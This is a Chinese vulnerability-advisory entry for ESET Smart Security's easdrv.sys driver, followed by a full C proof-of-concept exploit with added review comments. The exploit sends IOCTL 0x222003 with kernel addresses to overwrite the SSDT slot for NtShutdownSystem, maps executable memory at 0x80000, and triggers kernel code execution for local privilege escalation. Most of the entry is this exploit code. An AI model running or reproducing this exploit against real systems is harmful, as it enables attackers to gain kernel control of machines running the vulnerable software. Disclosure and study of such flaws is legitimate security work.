Eset Software Smart Security 3.0.667
描述:
BUGTRAQ ID: 30719
CNCAN ID:CNCAN-2008081903
ESET Smart Security是一款集成防火墙,反病毒的应用软件。
ESET Smart Security 'easdrv.sys'驱动存在输入检查问题,本地攻击者可以利用漏洞以内核进程权限执行任意指令。
文件:easdrv.sys
.text:00012B92 loc_12B92:
.text:00012B92 push [ebp+InputBuf]
.text:00012B95 call ds:off_1A200[eax]
.text:00012B9B mov ecx, [ebp+OutputBuffer]
.text:00012B9E mov [ecx], eax
驱动没有调用 ProbeForRead/ProbeForWrite 检查输入和输出指针,当 input/output 指向内核模式内存(高于 0x80000000)时会导致蓝屏。
上面的代码可通过向设备 \\.\\easdrv 发送 IoControlCode = 0x222003 来触发。
<* 参考
http://www.orange-bat.com/adv/2008/adv.08.14.txt
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
//
// ESET SmartSecurity priv. escalation
//
// visit www.orange-bat.com for full advisory
//
// g_
// g_ # orange-bat # com
#include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>
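void TextError(LPTSTR lpszFunction)
{
/*
 * Print "<function> failed with error <code>: <system message>" for the
 * calling thread's last Win32 error code. Diagnostic only: no return value,
 * and GetLastError() is read here, so call it immediately after the failing
 * API.
 *
 * lpszFunction  name of the API that failed; printed verbatim.
 */
DWORD dw = GetLastError();
LPVOID lpMsgBuf = NULL;
DWORD msgLen = FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
dw,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0, NULL );
/* FormatMessage itself can fail (unknown code, no message table); the
 * original then called lstrlen on an uninitialised lpMsgBuf. */
if (msgLen == 0 || lpMsgBuf == NULL) {
printf("%s failed with error %lu (no system message available)\n", lpszFunction, dw);
return;
}
/* +40 leaves room for the fixed text and the decimal error code. */
size_t cb = (lstrlen((LPCTSTR)lpMsgBuf) + lstrlen((LPCTSTR)lpszFunction) + 40) * sizeof(TCHAR);
LPTSTR lpDisplayBuf = (LPTSTR)LocalAlloc(LMEM_ZEROINIT, cb);
if (lpDisplayBuf == NULL) {
/* Print the pieces directly rather than writing through a NULL buffer. */
printf("%s failed with error %lu: %s", lpszFunction, dw, (LPCTSTR)lpMsgBuf);
LocalFree(lpMsgBuf);
return;
}
/* Bounded format into the buffer; %lu matches DWORD (unsigned long). */
snprintf((char *)lpDisplayBuf, cb, "%s failed with error %lu: %s",
lpszFunction, dw, (LPCTSTR)lpMsgBuf);
/* The assembled text is data, never a format string: system messages can
 * legitimately contain '%' sequences (inserts are left literal by
 * FORMAT_MESSAGE_IGNORE_INSERTS), so the original printf(lpDisplayBuf) was
 * a format-string bug. */
fputs((const char *)lpDisplayBuf, stdout);
LocalFree(lpMsgBuf);
LocalFree(lpDisplayBuf);
}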
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
/*
 * Open the device named by DeviceName, send a single IOCTL with the
 * caller-supplied raw buffer addresses and lengths, report any failure
 * through TextError, and close the handle.
 *
 * InputBuffer/OutputBuffer are DWORDs cast to PVOID, i.e. raw addresses;
 * this only round-trips a pointer on a 32-bit build (assumed - TODO confirm).
 * Nothing here validates those addresses: whatever the caller passes is
 * handed straight to the driver, which is exactly what the PoC relies on.
 *
 * Returns FALSE only when CreateFile fails. NOTE(review): a failed
 * DeviceIoControl is printed but the function still returns TRUE, so the
 * caller cannot tell a rejected IOCTL from a successful one.
 */
HANDLE hDevice; // device handle
BOOL bResult; // DeviceIoControl result; only consulted for error reporting
DWORD junk; // bytes returned, discarded
IO_STATUS_BLOCK IoStatusBlock; // never used
hDevice = CreateFile(DeviceName,
0, // desired access 0: no read/write rights requested
FILE_SHARE_READ | // share mode
FILE_SHARE_WRITE,
NULL, // default security attributes
OPEN_EXISTING, // disposition: device must already exist
0, // file attributes
NULL); // no template file
if (hDevice == INVALID_HANDLE_VALUE) // cannot open the device
{
TextError("CreateFile");
return (FALSE);
}
bResult = DeviceIoControl(hDevice, // device to be queried
Ioctl,
(PVOID)InputBuffer,
InputLen,
(PVOID)OutputBuffer,
OutputLen, // output buffer
&junk, // # bytes returned
(LPOVERLAPPED)NULL); // synchronous I/O
if(!bResult){
TextError("DeviceIoControl");
}
CloseHandle(hDevice);
return TRUE; // unconditional; see the note above
}
int AllocMem(DWORD lpBase){
/*
 * Commit 0x1337 bytes at the fixed address lpBase as PAGE_EXECUTE_READWRITE
 * (one mapping that is both writable and executable).
 * Returns 1 on success, 0 after reporting the VirtualAlloc error.
 * main passes 0x80000, a low user-mode address the PoC expects to be free;
 * the size is not page-aligned, VirtualAlloc rounds it up to whole pages.
 */
PVOID lpvResult;
lpvResult = VirtualAlloc(
(LPVOID) lpBase, // fixed base address requested by the caller
0x1337, // requested size in bytes (rounded up to page granularity)
MEM_COMMIT, // commit the pages
PAGE_EXECUTE_READWRITE); // RWX: writable and executable
if (lpvResult == NULL ){
TextError("VirtualAlloc");
return 0;
}
else {
printf("VirtualAlloc success\n");
}
return 1;
}
int main(int argc, char *argv[])
{
/*
 * Proof of concept for the unchecked OutputBuffer pointer described above:
 * the driver stores its dispatch result through the user-supplied output
 * pointer (mov [ecx], eax) without ProbeForWrite. Flow:
 *   1. commit an RWX region at 0x80000 (AllocMem);
 *   2. send IOCTL 0x222003 twice with OutputBuffer set to kernel addresses
 *      around a hard-coded SSDT slot (SSDT-1 and SSDT+2), so the driver's
 *      write lands in kernel memory;
 *   3. call NtShutdownSystem, whose SSDT entry the author expects to now
 *      point at 0x80000 (per the printf below; not verifiable from here).
 * The kernel address 0x80501414 is build-specific (the inline comment names
 * one ntoskrnl layout), so against any other kernel the writes corrupt
 * unrelated kernel memory and the result is a crash rather than escalation.
 * argc/argv, Ioctl, ILen, Output and OLen are unused.
 *
 * Detection angle for defenders: a user-mode process other than the
 * vendor's own opening \\.\easdrv and issuing IOCTL 0x222003.
 */
DWORD Ioctl, Input, ILen, Output, OLen;
DWORD SSDT;
if(!AllocMem(0x80000)){
return 1;
}
Input = 12345678; // decimal, not hex; its meaning to the driver is not shown here
SSDT = 0x80501414; //80501414 8060786e nt!NtShutdownSystem
Output = 0; // assigned but never used
// &Input is passed where a DWORD is expected - assumes a 32-bit build.
// TestIOCTL returns TRUE unless CreateFile fails, so the else branch below
// really does mean "could not open the device".
if(TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT-1, 4)){
TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT+2, 4);
printf("NtShutdownSystem now points to 0x80000 :)");
printf("Jump to hyperspace in 2 seconds..");
Sleep(2*1000);
NtShutdownSystem(0); // invokes the patched SSDT entry; nothing restores it afterwards
}
else{
printf("Failed to open device");
}
return 0;
}









